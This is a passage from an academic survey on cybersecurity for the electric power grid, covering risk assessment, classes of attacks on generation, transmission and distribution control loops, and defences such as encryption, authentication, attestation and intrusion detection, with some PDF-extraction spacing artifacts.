are explored. Section IV provides a review of current research efforts focusing on security enhancements for the supporting infrastructure . Finally, emerging research challenges are introduced in Section V to highlight areas requiring attention. II.RISK ASSESSMENT METHODOLOGY The complexity of the cyber physical relationship can present unintuitive system dependencies. Performing ac-curate risk assessments requires the development ofmodels that provide a basis for dependency analysis andquantifying resulting impact s. This association between the salient features within both the cyber and physical infrastructure will assist in the risk review and mitigation processes. This paper presents a coarse assessment meth-odology to illustrate the dependency between the powerapplications and supporting infrastructure. An overview ofthe methodology is presented in Fig. 2. Risk is traditionally defined as the impact times the likelihood of an event [8]. Likelihood should be ad-dressed through the infrastructure vulnerability analysis step which addresses the supporting infrastructure s ability to limit attacker s access to the critical controlfunctions. Once potential vul nerabilities are discovered, the application impact analysis should be performed todetermine effected grid control functions. This informa-tion should then be used to evaluate the physical systemimpact. Fig. 1. Power grid cyber physical infrastructure.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid Vol. 100, No. 1, January 2012 | Proceedings of the IEEE 211 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. A. Risk Analysis The initial step in the risk analysis process is the infra- structure vulnerability analysis .N u m e r o u sd i f f i c u l t i e sa r e encountered when determining cyber vulnerabilitieswithin control system environ ments due to the high avail- ability requirements and dependencies on legacy systems and protocols [9]. A comprehensive vulnerability analysis should begin with the identification of cyber assets includ-ing software, hardware, and communications protocols.Then, activities such as penetration testing and vulne-rability scanning can be utilized to determine potentialsecurity concerns within the environment. Additionally,continued analysis of security advisories from vendors,system logs, and deployed intrusion detection systems should be utilized to determine additional system vulner- abilities. Common control system cyber vulnerabilitieshave been evaluated by the Department of HomelandSecurity (DHS) based on numerous technical and non-technical assessments [10]. Table 1 identifies these vul-nerabilities and categorizes whether they were found inindustry software products, general misconfigurations, orwithin the network infrastructure. This list provides greater insight into likely attack vectors and also helps identify areas requiring additional mitigation research. After cyber vulnerabilities have been identified, the application impact analysis step should be performed todetermine possible impacts to the applications supportedby the infrastructure. This analysis should leverage theclassification introduced in Section III to identify the im-pacted set of communication and control mechanisms. Once attack impacts on the power applications have been determined, physical impact an alysis should be performed to quantify impact on the power system. This analysis canbe carried out using power system simulation methods toquantify steady state and tran sient performances including power flows and variations in grid stability parameters interms of voltage, frequency, and rotor angle. B. Risk Mitigation Mitigation activities should attempt to minimize unac- ceptable risk levels. This may be performed through thedeployment of a more robust supporting infrastructure or power applications as discussed in Sections III and IV. Understanding opportunities to focus on specific or com-bine approaches may present novel mitigation strategies. Numerous research efforts have addressed the cyber physical relationship within the risk assessment process.Interdependency research by Laprie et al. focuses on ana- lyzing escalating, cascading, and common-cause failureswithin the cyber physical relationship [11]. State ma- chines are developed to evaluate the transitions influenced by the interdomain dependencies. This research thenshows how attack-based transitions can lead to failurestates. A graph-based cyber physical model has been pro-posed by Kundur et al. [12]. Here graphs are analyzed to evaluate a control s influence on a physical entity. Thismodel is used to evaluate how power generation can beimpacted by the failures or attacks on cyber assets. Addi- tional research into computing likely load loss due a successful cyber attack has been performed by Ten et al. [13], [14]. This research uses probabilistic methods basedon Petri-nets and attack trees to identify weaknesses insubstations and control centers which can then be used toidentify load loss as a percentage of the total load withinthe power system. Table 1 Common Control System Vulnerabilities/Weaknesses Fig. 2. Risk assessment methodology.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid 212 Proceedings of the IEEE |V o l .1 0 0 ,N o .1 ,J a n u a r y2 0 1 2 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. III. POWER SYSTEM CONTROL APPLICATIONS AND SECURITY A power system is functionally divided into generation, transmission, and distributi o n .I nt h i ss e c t i o n ,w ep r e s e n t a classification of control loops in the power system that identifies communication signals and protocols, machines/devices, computations, and control actions associated withselect control loops in each functional classification. Thesection also sheds light on the potential impact of cyberattacks directed at these control loops on system-widepower system stability. Control centers receive measurements from sensors that interact with field devices (transmission lines, trans- formers, etc.). The algorithm s running in the control cen- ter process these measurements to make operationaldecisions. The decisions are then transmitted to actuatorsto implement these changes on field devices. Fig. 3 shows ageneric control loop that represents this interaction be-tween the control center and the physical system. Themeasurements from sensors and control messages from the control center are represented by y i t and ui t ,r e s p e c - tively. In the power system, the measured physical param-eters y i t may refer to quantities such as voltage and power. These measurements from substations, transmis-sion lines, and other machines are sent to the controlcenter using dedicated communication protocols. Themeasurements are then processed by a set of computa-tional algorithms, collectively known as the energy man- agement system (EMS), running at the control center. The decision variables u i t are then transmitted to actuators associated with field devices. An adversary could exploit vulnerabilities along the communication links and create attack templates designedto either corrupt the content of (e.g., integrity attacks), orintroduce a time delay or denial in the communication of[e.g., denial of service (DoS), desynchronization, timing attacks] these control/measurement signals [15]. It is im- portant to study and analyze impacts of such attacks on thepower system as they could severely affect its security andreliability. These impacts can be measured in terms of lossof load or violations in system operating frequency andvoltage and their secondary impacts. Attack studies willalso help develop countermeasures that can prevent at-tacks or mitigate the impact from attacks. Countermea- sures include bad data detection techniques and attack resilient control algorithms. This section presents a classification of prominent control loops under generation, transmission, and distri-bution. Traditional supervisory control and data acquisi-tion (SCADA), local, and emerging smart grid controlshave been identified. For each control loop known vulne-rabilities, attack templates, and potential research direc- tions have also been highlighted. A. Generation Control and Security The control loops under generation primarily involve controlling the generator power output and terminal volt-age. Generation is controlled by both, local (automaticvoltage regulator and governor control) and wide-area(automatic generation control) control schemes as ex-plained in this section. Fig. 4 identifies the various param-eters associated with the control loops in the generationsystem. 1) Automatic Voltage Regulator (AVR): Generator exciter control is used to improve power system stability by con-trolling the amount of reactive power being absorbed orinjected into the system [16]. Digital control equipment forthe exciter enables testing of different algorithms forsystem stability improvement. Hence, this cost-effective Fig. 3. A typical power system control loop. Fig. 4. Generation control classification.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid Vol. 100, No. 1, January 2012 | Proceedings of the IEEE 213 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. approach is widely preferred and used by generation utilities. The digital exciter control module is connected to the plant control center via Ethernet and communicates usingprotocols such as Modbus [17]. This Ethernet link is usedto program the controller with voltage setpoint values. TheAVR control loop receives generator voltage feedback fromthe terminal and compares it with the voltage setpointstored in memory. Based on the difference between the observed measurement and the setpoint, the current through the exciter is modified to maintain voltage atthe desired level. 2) Governor Control: Governor control is the primary frequency control mechanism. This mechanism employs asensor that detects changes in speed that accompanydisturbances and accordingly alters settings on the steam valve to change the power output from the generator. The controllers used in modern digital governor control mod-ules make use of Modbus protocol to communicate withcomputers in the control center via Ethernet [18]. As in thec a s eo fA V R ,t h i sc o m m u n i c a t i o nl i n ki su s e dt od e f i n eoperating setpoint for control over the governor. a) Cyber vulnerabilities and solutions: The AVR and the governor control are local control loops. They do not de- pend on the SCADA telemetry infrastructure for their ope- rations as both the terminal voltage and rotor speed aresensed locally. Hence, the attack surface for these controlloops is limited. Having said that, these applications are stillvulnerable to malware that could enter the substation LANthrough other entry points such as USB keys. Also, thedigital control modules in both control schemes do possesscommunication links to the plant control center. To target these control loops, an adversary could compromise plant cybersecurity mechanisms and gain an entry point into thelocal area network. Once this intrusion is achieved, an ad-versary can disrupt normal operation by corrupting thelogic or settings in the digital control boards. Hence, secu-rity measures that validate control commands that originateeven within the control center have to be implemented. 3) Automatic Generation Control: The automatic gener- ation control (AGC) loop is a secondary frequency controlloop that is concerned with fine tuning the system fre-quency to its nominal value. The function of the AGC loop is to make corrections to interarea tie-line flow and fre- quency deviation. The AGC ensures that each balancingauthority area compensates for its own load change and thep o w e re x c h a n g eb e t w e e nt w oc o n t r o la r e a si sl i m i t e dt othe scheduled value. The algorithm correlates frequencydeviation and the net tie-line flow measurements to deter- mine the area control error ; the correction that is sent to each generating station to adjust operating points once every five seconds. Through this signal, the AGC ensures that each balancing authority area meets its own loadchanges and the actual power exchanged remains as closeas possible to the scheduled exchange. a) Cyber vulnerabilities and solutions: The automatic generation control relies on tie-line and frequency meas-urements provided by the SCADA telemetry system. Anattack on AGC could have direct impacts on system fre- quency, stability, and economic operation. DoS type of attacks might not have a significant impact on AGC opera-tion unless supplemented with another attack that requiresAGC operation. The following research efforts haveidentified the impact of data corruption and intrusion onthe AGC loop. Esfahani et al. [19] propose a technique using reach- ability analysis to gauge the impact of an intrusion attack on the AGC loop. In [20], Sridhar and Manimaran develop an attack template that ap propriately modifies the frequency and tie-line flow measurements to drive thesystem frequency to abnormal operating values. Areas of future research include: 1) evaluating impacts of DoS attacks on the AGC loop in combination with otherattacks that trigger AGC opera tion; and 2) development of domain-specific bad data detection techniques for AGC to identify data integrity attacks. B. Transmission Control and Security The transmission system normally operates at voltages in excess of 13 KV and the comp onents controlled include switching and reactive power support devices. It is the responsibility of the operator to ensure that the power flowing through the lines is within safe operating marginsand the correct voltage is mai ntained. The following con- trol loops assist the operator in this functionality. Fig. 5summarizes the communication protocols and other Fig. 5. Transmission control classification.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid 214 Proceedings of the IEEE |V o l .1 0 0 ,N o .1 ,J a n u a r y2 0 1 2 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. parameters associated with the control loops in the transmission system. 1) State Estimation: Power system state estimation is a technique by which estimates of system variables such asvoltage magnitude and phase angle (state variables) aremade based on presumed faulty measurements from fielddevices. The process provides an estimate of state variablesnot just when field devices provide imperfect measure- ments, but also when the control center fails to receive measurements either due to device or communicationchannel malfunction. This gives the operator details onpower flows and voltage magnitudes along different sec-tions of the transmission network and hence assists inmaking operational decisions. The control center performscomputations using thousands of measurements it receivesthrough the wide-area network. A good amount of work has been done in developing tech niques to detect bad data in state estimation [21] [26]. These techniques provide goodestimates of state variables despite errors introduced bydevice and channel imperfecti ons. However, they were not designed to be fault tolerant when malicious data areinjected with intent. a) Cyber vulnerabilities and solutions: Bad data detec- tion in state estimation is well researched. However, these techniques were developed for errors in data that appear due to communication channel o r device malfunctioning. When an adversary launches an attack directed at disrupt-ing the smooth functioning of state estimation, these tech-niques might not be able to detect the presence ofmalicious data. Liu et al. created a class of attacks, called false data injection attacks, that escape detection by existing bad measurement identification algorithms, provided they had knowledge of the system configuration [27]. It was deter-mined that to inject false data into a single state variable inthe IEEE 300-bus system, it was sufficient to compromiseten meters. In [28], Kosut et al. verify that the impact from false data injection attack discussed in [27] is the same asremoving the attacked meters form the network. Theauthors also propose a graph-theoretic approach to deter- mine the smallest set of meters that have to be compro- mised to make the power network unobservable. Bobba et al. [29] developed a technique to detect false data injection attacks. The idea was to observe a subset ofmeasurements and perform calculations based on them todetect malicious data. Xie et al. show that a successful attack on state estimation could be used in the electricitymarkets to make financial gains [30]. As settlements be- tween utilities are calculated based on values from state estimation, the authors show that a profit of $8/MWh canbe made by tampering with meters that provide line flowinformation. 2) VAR Compensation: Volt-ampere reactive (VAR) compensation is the process of controlling reactive powerinjection or absorption in a power system to improve the performance of the transmission system. The primary aim of such devices is to provide voltage support, that is, tominimize voltage fluctuation at a given end of a trans-mission line. These devices can also increase the powertransferable through a given transmission line and alsohave the potential to help avoid blackout situations.Synchronous condensers and mechanically switchable capacitors and inductors were the conventional VAR com- pensation devices. However, with recent advancement in thyristor-based controlle r s ,d e v i c e ss u c ha st h eo n e s belonging to the flexible AC transmission systems(FACTS) family, are gaining popularity. FACTS devices interact with one another to exchange operational information [31]. Though these devices func-tion autonomously, they depend on communication withother FACTS devices for information to determine ope- rating point. a) Cyber vulnerabilities and solutions: In [32], the authors provide a list of attack vectors that could be usedagainst cooperating FACTS devices (CFDs). Though at-tacks such as denial of service and data injection are wellstudied and understood in the traditional IT environment,the authors provide an insight into what these attacksmean in a CFD environment. 1) Denial of cooperative operation: This is a DoS attack. In this type of attack, the communicationto some or all the FACTS devices could be jammedby flooding the network with spurious packets.This will result in the loss of critical informationexchange and thus affect long-term and dynamiccontrol capabilities. 2) Desynchronization (ti ming-based attacks): The control algorithms employed by CFDs are time dependent and require strict synchronization. Anattack of this kind could disrupt steady operationof CFDs. 3) Data injection attacks: This type of attacks re- quires an understanding of the communicationprotocol. The attack could be used to send in-correct operational data such as status and control information. This may result in unnecessary VAR compensation and in unstable operating condi-tions. Attack templates of this type were imple-mented on the IEEE 9-bus system and the resultsare presented in [33]. 3) Wide-Area Monitoring Systems: PMU-based wide-area measurement systems are curre ntly being installed in the United States and other parts of the world. The phase angles of voltage phasors measured by PMUs directly helpin the computation of real power flows in the network, andcould thus assist in decision ma king at the control center. PMU-based control applications are yet to be used for real-time control. However, Phadke and Thorp [34] identifycontrol applications that could be enhanced by using dataSridhar et al. : Cyber Physical System Security for the Electric Power Grid Vol. 100, No. 1, January 2012 | Proceedings of the IEEE 215 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. provided by PMUs. It is suggested that HVDC systems, centralized excitation systems, FACTS controllers, and power system stabilizers could benefit from wide-areaPMU measurements. PMUs use global positioning system (GPS) technology to accurately timestamp phasor measurements. Thus, thephase difference between voltages on either end of atransmission line, at a given instant, can be accuratelymeasured by using this technology. Phasor data concen- trators combine data from multiple PMUs and provide a time-aligned data set for a particular region to the controlcenter. The North American SynchroPhasor Initiative(NASPInet) [35] effort aims to develop a wide-area com-munications infrastructure to support this PMU operation.It is recognized that PMU-based control applications willbe operational within the next five years. Hence, a secureand dependable WAN backbone becomes critical to power system stability. C. Distribution Control and Security The distribution system is responsible for delivering power to the customer. With the emergence of the smartgrid, additional control loops that enable direct control ofload at the end user level are becoming common. Thissection identifies key controls that help achieve this. Fig. 6identifies communication pro tocols and other parameters for key control loops in the distribution system. 1) Load Shedding: Load shedding schemes are useful in preventing a system collapse during emergency operatingconditions. These schemes can be classified into proactive,reactive, and manual. Active and proactive schemes areautomatic load shedding schemes that operate with thehelp of relays. For example, in cases where the system generation is insufficient to match up to the load, auto- matic load shedding schemes c ould be employed to main- tain system frequency within safe operating limits andprotect the equipment connected to the system. When theneed arises, load is shed by a utility at the distribution levelby the under-frequency relays connected to the distribu-tion feeder. a) Cyber vulnerabilities and solutions: Modern relays are Internet protocol (IP) ready and support communica- tion protocols such as IEC 61850. An attack on the relaycommunication infrastructure or a malicious change to the control logic could result in unscheduled tripping of dis- tribution feeders, leaving load segments unserved. Theoutage that occurred in Tempe, AZ, in 2007, is an exampleof how an improperly configured load-shedding program canresult in large-scale load shedding [36]. The distribution load-shedding program of the Salt River Project was unexpectedlyactivated resulting in the opening of 141 breakers and a loss of399 MW. The outage lasted 46 min and affected 98 700 customers. Though the incident occurred due to a poor configuration management by the employees, it goes on toshow the impact an adversary can cause if a substation issuccessfully intruded. 2) AMI and Demand Side Management: Future distribu- tions systems will rely heavily on AMI to increase reliabi-lity, incorporate renewable energy, and provide consumers with granular consumption monitoring. AMI primarily relies on the deployment of Bsmart meters [at consumer s locations to provide real-time meter readings. Smart me-ters provide utilities with the ability to implement loadcontrol switching (LCS) to disable consumer devices whendemand spikes. Additionally, demand side management[37] introduces a cyber physical connection between themetering cyber infrastructure and power provided to con- sumers. The meter s current configuration is controlled by a meter data management system (MDMS) which liesunder utility control. The MDMS connects to an AMIheadend device which forwar ds commands and aggregates data collected from the meters throughout the infrastruc-ture [38]. Networking within the AMI infrastructure willlikely rely on many different technologies including RFmesh, WiMax, WiFi, and power line carrier. Application layer protocols such as C12.22 or IEC 61850 will be uti- lized to transmit both electricity usage and meter controloperations between the meters and the MDMS. Fig. 7provides an overview of the control flows that could impactconsumer power availability. a) Cyber vulnerabilities and solutions: The smart me- ters at consumer locations also introduce cyber physicalconcerns. Control over whether the meter is enabled or disabled and the ability to remotely disable devices through load control switching provide potential threats fromattackers. Adding additional security into these functions Fig. 6. Distribution control classification.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid 216 Proceedings of the IEEE | Vol. 100, No. 1, January 2012 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. presents interesting challenges. A malicious meter disabling command can likely be prevented through the use of time-wait periods [39]. Since meter disabling does not require areal-time response, meters could be programmed to waitsome time after receive a command before disabling thedevice. This prevention would only address remote attacks asthe prevention logic could be bypassed if an attackercompromises the meter. Malicious LCS commands could provide a greater challenge due to more strict temporal requirements. IV.SUPPORTING INFRASTRUCTURE SECURITY The development of a secure supporting infrastructure is necessary to ensure information is accurately stored andtransmitted to the appropriate applications. While thesupporting infrastructure may share some common pro-perties with traditional IT syst ems, the variation is signifi- cant enough to introduce numerous unique and challenging security concerns [9]. Specific properties include: long system lifecycles ( >10 years); limited physical environment protection; restricted updating/change management capabilities; heavy dependency on legacy systems/protocols; limited information processing abilities. A secure information system traditionally enforces the confidentiality of its data to protect against unauthorized access while ensuring its integrity remains intact. In addi- tion, the system must provide sufficient availability of information to authorized users. The primary goal of any cyber physical system is to provide efficient control oversome physical process. This naturally prioritizes informa-tion integrity and availability to ensure control stateclosely mirrors the physical system state. Security mecha- nisms such as cryptography, access control, and authen- tication are necessary to provide integrity in systems,however, all security mechanism tailored for this environ-ment must also provide sufficient availability. This con-straint often limits the utilization of security mechanismswhich fail-closed as they may deny access to a criticalfunction.The development of a trustworthy electric grid requires a thorough reevaluation of the supporting technologies toensure they appropriately achieve the grid s unique re- quirements. The remainder of this section will addressrequired security concerns within the supporting infra-structure and provide a review of current research effortsaddressing these concerns. While there are a vast numberof research areas within this domain, this paper will focus on areas with active security research tailoring to the smart grid s supporting infrastructure. A. Secure Communication Power applications require a secure communications infrastructure to cope with the grid s geographic disperseresources. Data transmission often utilizes wireless com-munication, dialup, and leas ed lines which provide in- creased physical exposure and introduces additional risk.The grid is also heavily reliant on its own set of higher levelcontrol system protocols, including Modbus, DNP3, IEC61850, and ICCP. Often these protocols were not dev- eloped to be attack resilient and lack sufficient security mechanism. This section will detail how encryption, au-thentication, and access control can be added to currentcommunications to provide increased security. 1) Encryption: Retrofitting communication protocols to provide additional security is necessary for their continueduse within untrusted spaces. Often this level of security can be obtained by deploying encrypted virtual private networks (VPNs) that protect network traffic throughencapsulation within a cryptographic protocol [9]. Unfor-tunately, this solution is not always feasible as the industryis fairly dependent on non-IP networks. In addition, strictavailability requirements may not be able to handle theadded latency produced by a VPN. Research into bump-in-the-wire (BITW) encryption hardware attempts to ensure that messages can be appro- priately encrypted and authenticated while limiting thelatency appended by the solution. Work by Tsang andSmith provides a BITW encryption method that signifi-cantly reduces the latency through the reduction of mes-sage hold-back during the encryption and authentication[40]. Additional research has focused on retrofitting old Fig. 7. Control functions within AMI.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid Vol. 100, No. 1, January 2012 | Proceedings of the IEEE 217 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. protocols with appropriate security properties. Numerous efforts have addressed the modification of traditional SCADA protocols such as ICCP, DNP3, and Modbus to provideadditional security while maintaining integration withcurrent systems [41] [43]. Deployment and key manage-ment activities still provide difficulties within geographicallydisperse environments. 2) Authentication: Secure remote authentication pre- sents a challenge due to the lengthy deployments and li- mited change management cap abilities. Authentication credentials (e.g., keys and passwords) exposure increasesthroughout their lifetime and protocols become increas-ingly prone to attack due to continual security reviews andcryptanalysis advancements. The development of strong,adaptive, and highly availabl e authentication mechanisms is imperative to prevent unauthorized access. Research by Khurana, et al. has defined design princi- ples required for authentication protocols within the grid[44]. By defining authentication principles, future systemdesigners can ensure their systems achieve the efficiencyand adaptability required for continued secure use.Additionally, research into more flexible authenticationprotocols has been proposed by Chakravarthy to provideadaptability to long deployments [45]. The proposed pro- tocol provides re-keying and remoduling algorithms to protect against key compromises and future authenticationmodule vulnerabilities. 3) Access Control: While encryption and authentication can deter external attackers, they do little to prevent againstinsider threats or attackers that have already gained some internal access. Attackers with access to a communication network may be able to leverage various protocol functionality to inject malicious commands into controlfunctions. The likelihood of a successful attack could besignificantly reduced by appropriately configuring softwareand protocol usage to disable unnecessary functionality. Evaluating industry protocols to identify potentially malicious functions is imperative to ensuring secure sys-tem configurations. Work by Mander dissects the DNP3 protocol detailing the function codes and data objects that would be useful for attackers to access data, control, orimpact the availability of a remote DNP3 master [46]. Thisresearch provides a foundation for understanding thelikely physical impact from a compromised communica-tion channel. Additional research in this domain modelsfeasible attacks against a control systems based on thecurrent protocol specification [47]. More sophisticated protocols targeted for smart grid use, such as ANSI C.12.22 and IEC 61850, require additional analysis to ensure se-cure implementation in new system deployments. B. Device Security Embedded systems are used throughout the grid to support monitoring and control functions. The criticalrole placed on these devices introduces significant cyber- security concerns due to their placement in physically unprotected environments. Large-scale deployments ofembedded devices also incentivizes the use of marginallycheaper hardware leaving little computational capacity tosupport various security functions such as malware or in-trusion monitoring. This also stymies the ability to producethe amount of entropy required to create secure crypto-graphic keys [48]. The development of secure computation within embedded platforms provides a key challenge throughout CPSs. 1) Remote Attestation: Smart meters provide one parti- cularly concerning utilization of embedded systems due totheir expansive deployment s and impact to consumers. Research into the development of remotely attestablesmart meters has suggested that a small static kernel can be used to cryptographically sign loaded firmware [49]. This resulting signature can then be sent as a response to attes-tation queries to verify meters have not been corrupted. Bya l s op r o v i d i n gs u p p o r tf o rr e m o t ef i r m w a r eu p d a t e st h ekernel can allow future reconfiguration of the deviceswhile still providing a trusted platform. Unfortunately,these security mechanisms may still remain vulnerable toadditional attack vectors [50]. Embedded devices also play important roles in the bulk power system. Intelligent electronic devices (IEDs) utilizeembedded devices to control relays throughout the grid. Recent events have shown these devices can be maliciouslyreprogrammed to usurp intended control functions [5].The development of improved attestation mechanismswill play a critical role in the cybersecurity enhancementof the grid. C. Security Management and Awareness An increased awareness of security risk and appropri- ately managing security relevant information provides anequally important role in maintaining a trusted infrastruc-ture. This section will address a range of security activitiesand tools including digital fore nsics and security incident/ event management. 1) Digital Forensics: The ability to perform accurate digital forensics within the electric grid is imperative to identifysecurity failures and preventing future incidents. Strongforensic capabilities are also necessary during event inves-tigation to determine the cause or extent of damage from anattack. While forensic analysis on traditional IT systems iswell researched, the large number of embedded systems and legacy devices within the grid provides new challenges. Research efforts by Chandia et al. have proposed the deployment of Bforensic agents [throughout the cyber infrastructure to collect data about potential attacks [51].Information collected by these agents can then be prio-ritized based on their ability to negatively affect gridoperations.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid 218 Proceedings of the IEEE | Vol. 100, No. 1, January 2012 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. Expanding forensic capabilities within embedded sys- tems including meters and IEDs is necessary to ensure these critical resources maint ain integrity. Additionally, operational systems may not be detached for forensicsanalysis, and research into on line analysis methods should be explored for these instances. 2) Security Incident and Event Management: The devel- opment of technologies to collect and analyze interesting data sources such as system logs, IDS results and network flow information is necessary to ensure data are properlyorganized and prioritized. Briesemeister et al. researched the integration of various cybersecurity data sources within acontrol system and demonstrated its ability to detect attacks[52]. This work also coupled visualization tools to provideoperators with a real-time understanding of network health.Tailoring this technology to provide efficient analysis of the grid will place an impetus on control system alarms as they provide information on potential physical impacts initiatedby cyber attacks. Incidents and events within the smart grid will vary greatly from their IT counterparts, analysis methodsshould be correlated with knowledge of the physical sys-tem to determine anomalies. Aggregation and analysisalgorithms may need tailoring for environments with decreased incident rates due to smaller user bases and segregated networks. D. Cybersecurity Evaluation 1) Cybersecurity Assessment: The grid s security postures should be continually analyzed to ensure it provides ade- q u a t es e c u r i t y .T h es y s t e m sc o m p l e x i t y ,l o n gl i f e s p a n s ,a n d continuously evolving cyber threats present novel attackvectors. The detection and removal of these security issuesshould be addressed specific t o both the power applications and supporting infrastructure. Current research has prima-rily focused on the supporting infrastructure as it maintainsmany similarities with more traditional cyber security test-ing. Methodologies used to perform vulnerability assess- ments and penetration tes ting have raised numerous cybersecurity concerns within the current grid [53], [54]. Smart grid technologies will present increasing inter- domain connectivity, thereby creating a more exposed cy-ber infrastructures and trust dependencies between manydifferent parties. NIST s BGuidelines for Smart Grid Cyber Security [(NISTIR 7628) has proposed more robust set of cybersecurity requirements to ensure the appropriateness of cyber protection mechanism [2]. NIST identifies logical interfaces between systems and parties while assigning acriticality level (e.g., high, m edium, low) for the interface s confidentiality, integrity, and availability requirements.The document then presents a list of necessary controls toprovide an appropriate baseline security for the resultinginterfaces.2) Research Testbeds and Evaluations: Researching cyber physical issues requires the ability to analyze the relationship between the cyber and physical components.Real-world data sets containing system architecture, powerflows, and communication payloads are currently unavail-able. Without these data researchers are unable to produceaccurate solutions to modern problems. Increased collab-oration between government, industry, and academia isrequired to produce useful data which can facilitate needed research. While SCADA testbeds provide a founda- tional tool for the basis of cyber physical research, ensur-ing that system parameters closely represent real-worldsystems remains a challenge. The development of SCADA testbeds provides critical resources to facilitate research within this domain. TheNational SCADA Test Bed (NSTB) hosted at Idaho Na-tional Laboratory provides a real-world test environment employing real bulk power system components and control software [55]. Resulting NSTB research has resulted in thediscovery of multiple cyber vulnerabilities [56]. While thisprovides an optimal test environment, the cost is imprac-tical for many research efforts. Work done by SandiaNational Laboratory has utilized a simulation-based test-bed allowing the incorporation of both physical and virtualcomponents. The virtual control system environment (VCSE) allows the integration of various different power system simulators into a simulated network environmentand industry standard control system software [57]. Acade-mic efforts at Iowa State University and the University ofIllinois at Urbana-Champaign provide similar environ-ments [58], [59]. E. Intrusion Tolerance W h i l ea t t e m p t st op r e v e n ti n t r u s i o n sa r ei m p e r a t i v et o the development of a robust cyber infrastructure, failuresin prevention techniques will likely occur. The ability to detect and tolerate intrusions is necessary to mitigate thenegative effects from a successful attack. 1) Intrusion Detection Systems: The successful utilization of intrusion detection in the IT domain suggests it may also provide an important component in smart grid systems.Research by Cheung et al. has leveraged salient control system network properties into a basis for IDS technology[60]. Common data values, pr otocols functions, and com- munication endpoints were modeled by the IDS such thatall violating packets could be flagged as malicious. While the previous research provides unique detection capabilities, an attacker may still be able to create packets which closely resemble normal communications. For ex-ample, a command to trip a breaker cannot be flagged asmalicious since it is a commonly used control function.Producing grid-aware intrusion detection will require abuilt-in understanding of grid functions. Work by Jin et al. shows how basic power flow laws leveraging BayesianSridhar et al. : Cyber Physical System Security for the Electric Power Grid Vol. 100, No. 1, January 2012 | Proceedings of the IEEE 219 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. reasoning can help reduce false positives by exhibiting a real-world understanding of the system [61]. The transition to smart grid technologies will likely reduce the number of IDS affable qualities compared totraditional SCADA communications. Performing intrusiondetection in such a complex environment will requiren o v e ld a t ac o l l e c t i o nm e c h a n i s m sa sw e l la st h ea b i l i t yt odetect and aggregate attack indicators across multiplenetwork domains [62]. 2) Tolerant Architectures: Intrusion tolerance mechan- isms have recently have gained increased attention as amethod to ensure a system s abi lity to operate effectively during an attack. Research within the Crutial projectattempts to explore both proactive and reactive mechan-isms to prevent cyber attacks from impacting the system sintegrity [63]. This research explores a Byzantine tolerant protection paradigm which assures correct operations as long as no more than fout of 3 f 1 components are attacked. Extended research within in trusion tolerance should incorporate the smart grid specific availability require-ments and infrastructure designs. Traditional models re-laying on Byzantine fault/intrusion tolerance mechanismpresent significant cost and may not be practical within the smart grid. Future designs can leverage known physical system redundancies and recovery capabilities to assistwith traditional intrusion/fault tolerance design models. V.EMERGING RESEARCH CHALLENGES As smart grid technologies become more prevalent, future research efforts must target a new set of cybersecurity concerns. This section documents emerging research chal- lenges within this domain. A. Risk Modeling The risk modeling methodology and subsequent risk index should capture both, the vulnerability of cyber net-works in the smart grid and the potential impacts an ad-versary could inflict by exploiting these vulnerabilities. The cyber vulnerability assessment plan in risk modeling should be thorough. It should include allsophisticated cyber-attack scenarios such as elec-tronic intrusions, DoS, data integrity attacks, tim-ing attacks, and coordinated cyber attacks. Thetests should be conducted on different vendorssolutions and configurations. The impact analysis should include dynamics intro- duced by new power system components and asso- ciated control, along with existing ones. Theanalyses must check to see if any power systemstability limits are violated for different attacktemplates. For example, current wind generationturbines offer uneconomical frequency control anddo not contribute to system inertia. Hence, attackscenarios should include attacks on the system during high wind penetration. Managing exposure from increased attacks surfaces due to the inclusion of the AMI and MDMS infra-structures, widespread communication links todistribution control centers, and potentially trans-mission and generation control centers. Impactstudies should include attack vectors that targetsuch devices and evaluate system stability. B. Risk Mitigation Algorithms As in the case of risk modeling, risk mitigation must include solutions at both the cyber and power system level.Consider the following attack scenario. One fundamental vision of the smart grid is to allow controllability of do-mestic devices by utilities to help reduce costs. If an adversary intrudes into the AMI network of a neighbor- hood to turn on large chunks of load when they are expected to be turned off, the system could experiencesevere stability problems. Cyber defense mechanisms thatare able to detect/prevent such an attack, and powersystem defense mechanisms that ensure stable operationin the event of an attack, should be developed. Attack resilient control provides defense in depth to a CPS. In addition to dedicated cybersecurity soft- ware and hardware, robust control algorithms enhance security by providing security at the ap-plication layer. Measurements and other data ob-tained through the SCADA and emerging wide-areamonitoring systems have to be analyzed to detectthe presence of anomalies. For example, anapplication should first check if the obtainedmeasurement lies within an acceptable range and reject the ones that do not comply. However, a smart attacker could develop attack templates thatsatisfy these criteria and force the operator intotaking wrong control actions. Hence, additionaltests that are based on forecasts, historical data andengineering sense should be devised to ascertainthe current state of the system. An attack might not be successful if the malicious measurements do not conform to the dynamics of the system. In most cases, the physical parametersof the system (e.g., generator constants) are pro-tected by utilities. These parameters play a part indetermining the state of the system and systemresponse to an event. Hence, algorithms that incor-porate such checks could help in identifying mali-cious data when an attacker attempts to mislead the operator into executing incorrect commands. Intelligent power system control algorithms that are able to keep the system within stability limits dur-ing contingencies are cri tical. Additionally, the development of enhanced power management sys-tems capable of addressing 